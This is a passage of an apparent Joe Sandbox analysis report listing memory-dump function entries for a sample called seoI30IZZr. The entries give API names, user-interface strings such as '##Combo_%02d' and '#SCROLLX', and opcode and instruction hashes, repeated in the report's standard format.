                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                        • Opcode ID: 2db7dfdc03936b6bf7c48da1f1dffee80b17a559b217e68d35e256956bf76f98
                                                                                                                                                                        • Instruction ID: 80a05fca2e6599445ec2c44a8198d48cb35b88ac88b4c4ed56388a87740d3af8
                                                                                                                                                                        • Opcode Fuzzy Hash: 2db7dfdc03936b6bf7c48da1f1dffee80b17a559b217e68d35e256956bf76f98
                                                                                                                                                                        • Instruction Fuzzy Hash: C2115E22B14F419AEB00DFA0EC452BA73A4FB18758F840E31DA6D867A4DF7CD568C790
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FormatInfoLocaleMessage
                                                                                                                                                                        • String ID: !x-sys-default-locale
                                                                                                                                                                        • API String ID: 4235545615-2729719199
                                                                                                                                                                        • Opcode ID: 6382632fb6551c3d1f3fcaf78c734f7ee09439dfb8f0b72809a52a0a9b1e1e88
                                                                                                                                                                        • Instruction ID: 8ae98a22eba0810cbe4f5432bde823ba5c4c9242bedd0e963ed018c914c5f857
                                                                                                                                                                        • Opcode Fuzzy Hash: 6382632fb6551c3d1f3fcaf78c734f7ee09439dfb8f0b72809a52a0a9b1e1e88
                                                                                                                                                                        • Instruction Fuzzy Hash: BB018472F087C192E7119B52F9107ABA793F784784FA48035EA8906B94CF7CD954CB10
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: %*s%.*s$ %.*s
                                                                                                                                                                        • API String ID: 0-3400057116
                                                                                                                                                                        • Opcode ID: 101ef694adbca4e4ba29ea4c6ba4e87cabf422faf2781e82c88b9a0c7baaea15
                                                                                                                                                                        • Instruction ID: fca82befbb190ef49be5a3644df1e41e305b278805e433929af61b9257f8ad4f
                                                                                                                                                                        • Opcode Fuzzy Hash: 101ef694adbca4e4ba29ea4c6ba4e87cabf422faf2781e82c88b9a0c7baaea15
                                                                                                                                                                        • Instruction Fuzzy Hash: AB22B532E086C5A5E711EB36D8401FAB761FF693A8FA44331DB5827695EF38A844CF11
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF7865F81F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F834C
                                                                                                                                                                          • Part of subcall function 00007FF7865F81F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F8379
                                                                                                                                                                          • Part of subcall function 00007FF7865F81F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F83A0
                                                                                                                                                                          • Part of subcall function 00007FF7865F81F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7865F83C3
                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FACC7
                                                                                                                                                                          • Part of subcall function 00007FF7865F9C40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F9CFA
                                                                                                                                                                          • Part of subcall function 00007FF7865F9250: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F9352
                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FAC8B
                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FACA6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$ceilffloorfmalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 573317343-0
                                                                                                                                                                        • Opcode ID: 6103c6827c6f7d8e55da1acf43e3646be8bed51213157170e144a2b2a04bda1b
                                                                                                                                                                        • Instruction ID: 76867de3f60c9a562fa03dbff4635c1c5f04139cd6bbb6b9d4b3b2b5b32b1cdb
                                                                                                                                                                        • Opcode Fuzzy Hash: 6103c6827c6f7d8e55da1acf43e3646be8bed51213157170e144a2b2a04bda1b
                                                                                                                                                                        • Instruction Fuzzy Hash: FD12D332A18B948AE311DB35D4406BEB7B4FF5D744F158326EE8863754EB38E991CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: powf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3445610689-0
                                                                                                                                                                        • Opcode ID: 61ccd571a2d0150a639dbd3c576fc50a319b267b109b5d72c498ec22863b7b14
                                                                                                                                                                        • Instruction ID: e7861b60e7448bd7673199da3329d415d11fe19e251268fc64400c499981a174
                                                                                                                                                                        • Opcode Fuzzy Hash: 61ccd571a2d0150a639dbd3c576fc50a319b267b109b5d72c498ec22863b7b14
                                                                                                                                                                        • Instruction Fuzzy Hash: 19412451F28BCD52EC12A23A04028BAD5837F6A7C4EB8C731E94E31395EF2876D2CD10
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: #SCROLLX$#SCROLLY
                                                                                                                                                                        • API String ID: 0-350977493
                                                                                                                                                                        • Opcode ID: ad8c3ae938cae5e1364068c7c62dfdda6d58573bb671b2eafec8b0c8ddfa324d
                                                                                                                                                                        • Instruction ID: b74d0bd2ea662d49be95f3d9544cd58c3776e634a413f3bf34ad17b5f7b50d1c
                                                                                                                                                                        • Opcode Fuzzy Hash: ad8c3ae938cae5e1364068c7c62dfdda6d58573bb671b2eafec8b0c8ddfa324d
                                                                                                                                                                        • Instruction Fuzzy Hash: 5D12D522E18BCD95E213DA3795421BAB351FF7E384F68DB22FE4536162DB24B4D1CA10
                                                                                                                                                                        Strings
                                                                                                                                                                        • - -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X , xrefs: 00007FF786600BDD
                                                                                                                                                                        • ..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X..., xrefs: 00007FF786600BFC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: - -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...X $..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...
                                                                                                                                                                        • API String ID: 0-4293514333
                                                                                                                                                                        • Opcode ID: 37e8cdeb4ba418f8d4a705152ae5e262be9a6a161ea8553f01e88e4d1b9b64e2
                                                                                                                                                                        • Instruction ID: 4f166476fcc6bf230961a320ceac6ab01f05ab855a01f3fae623cbf014bcff4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 37e8cdeb4ba418f8d4a705152ae5e262be9a6a161ea8553f01e88e4d1b9b64e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 8CD11B237046D889D754CF2DC8C5A7DBB9AE794B02B9BC176CE89827A1EF7AC445C310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: [ ]$[x]
                                                                                                                                                                        • API String ID: 0-3323218928
                                                                                                                                                                        • Opcode ID: 6198f9d158b34d2eadace60d01b4764ae560e671f087e788dbe75f3397044d11
                                                                                                                                                                        • Instruction ID: c80c8417fc9c8d6799e9c95ff75835d5bd3d8ed654d38f9e358e5f7bdb9de2cc
                                                                                                                                                                        • Opcode Fuzzy Hash: 6198f9d158b34d2eadace60d01b4764ae560e671f087e788dbe75f3397044d11
                                                                                                                                                                        • Instruction Fuzzy Hash: 0AE10C32E18BC995E302EB3698411FAF351FF6E344F589731FE58265A6DB39A481CB10
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: VUUU$VUUU
                                                                                                                                                                        • API String ID: 0-3149182767
                                                                                                                                                                        • Opcode ID: 5d87d6ba4afe68662672b46fa6bdbe9a1e29de5b7660a827c943cf5e3ef8fec8
                                                                                                                                                                        • Instruction ID: 96b11d4d51de9cbdce719fc1e9c8f2b1042af9e7b880e60c966135afbe0908db
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d87d6ba4afe68662672b46fa6bdbe9a1e29de5b7660a827c943cf5e3ef8fec8
                                                                                                                                                                        • Instruction Fuzzy Hash: 89C1EC33F10B8899E301DB3AD8419E9B361FB6A7887149321FA0C77665DF34A591DB80
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                                        • Opcode ID: d40e23041365ade541bdf4a53b98d373e0afc8b5af528aafedd37807940236fb
                                                                                                                                                                        • Instruction ID: 00994a134d355a5a670c6efc1cd302a9f55e8acb184b538d0320d4b3bc15e170
                                                                                                                                                                        • Opcode Fuzzy Hash: d40e23041365ade541bdf4a53b98d373e0afc8b5af528aafedd37807940236fb
                                                                                                                                                                        • Instruction Fuzzy Hash: 08914932A19AC596DB11DB3AD4007BAB360FF99785F64C331DE49636A5EF38E485CB00
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: ##Combo_%02d
                                                                                                                                                                        • API String ID: 0-4250768120
                                                                                                                                                                        • Opcode ID: 2d66ad83fc5ffe68628b1058c1bc2f4d4678855f7c403d415a8a44415fcc44bc
                                                                                                                                                                        • Instruction ID: 580e7fa6fdc6705bb112f340a61241223f3ee289cec8ee2f788b6bdb7ca5b128
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d66ad83fc5ffe68628b1058c1bc2f4d4678855f7c403d415a8a44415fcc44bc
                                                                                                                                                                        • Instruction Fuzzy Hash: C842F532A18BC596E711EB36D8411EAF361FF99384F649332EA48665A5DF38E494CF00
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                        • Opcode ID: 527ef19b1038ab48084da004566cdd808e56da57c3c39390ccd3fb9dbd82dffe
                                                                                                                                                                        • Instruction ID: d63857bfa2f7b36701adff92b5dff182024c7dde17c7a3794c6d7f126f1e0c4f
                                                                                                                                                                        • Opcode Fuzzy Hash: 527ef19b1038ab48084da004566cdd808e56da57c3c39390ccd3fb9dbd82dffe
                                                                                                                                                                        • Instruction Fuzzy Hash: 09427176B04B8592E710DF26D8846AAB7B1FBC8B85F658232CE4D53B24CF39E445CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                        • Opcode ID: 00ed38a4f8997660fad8e667f80b229b9e1a2eba2e7b24625d25898ebcefaf7f
                                                                                                                                                                        • Instruction ID: d92e5432234c0914f7c74f515995360fc7c79b622750fe15a6102ffeb780e29d
                                                                                                                                                                        • Opcode Fuzzy Hash: 00ed38a4f8997660fad8e667f80b229b9e1a2eba2e7b24625d25898ebcefaf7f
                                                                                                                                                                        • Instruction Fuzzy Hash: 9B6139B361C2E392D7565B3CE84527EAED0B789348F6C9234EA8AC2B85C93CDD04C751
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                        • Opcode ID: 72f3ff59168126c3de56dea8762daef82d873cbdfea7066be461112d5e5ce4aa
                                                                                                                                                                        • Instruction ID: 9b7cf5bda005c7676e7fd55c7b874c24a90dbbaf97acdf2d77b00d1059ede1ca
                                                                                                                                                                        • Opcode Fuzzy Hash: 72f3ff59168126c3de56dea8762daef82d873cbdfea7066be461112d5e5ce4aa
                                                                                                                                                                        • Instruction Fuzzy Hash: 0F612773B1C6E1D6D7158B39E805A7AFEA4F789308F5A8235DA8CC3A45DA2FD900C711
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4d1fd18e4b0c39a78f19c14b58ed31fef6952396bb70bcc648b832da75d60cd3
                                                                                                                                                                        • Instruction ID: ac9e900fdfcce3f60cb2142108109cdadba41c060f4627e57d4810a908cff807
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d1fd18e4b0c39a78f19c14b58ed31fef6952396bb70bcc648b832da75d60cd3
                                                                                                                                                                        • Instruction Fuzzy Hash: 7EB27536D186C996E756AF36C4402FAB750FF59B48F6C8735DE082A195EF387980CB20
                                                                                                                                                                        Memory Dump Source
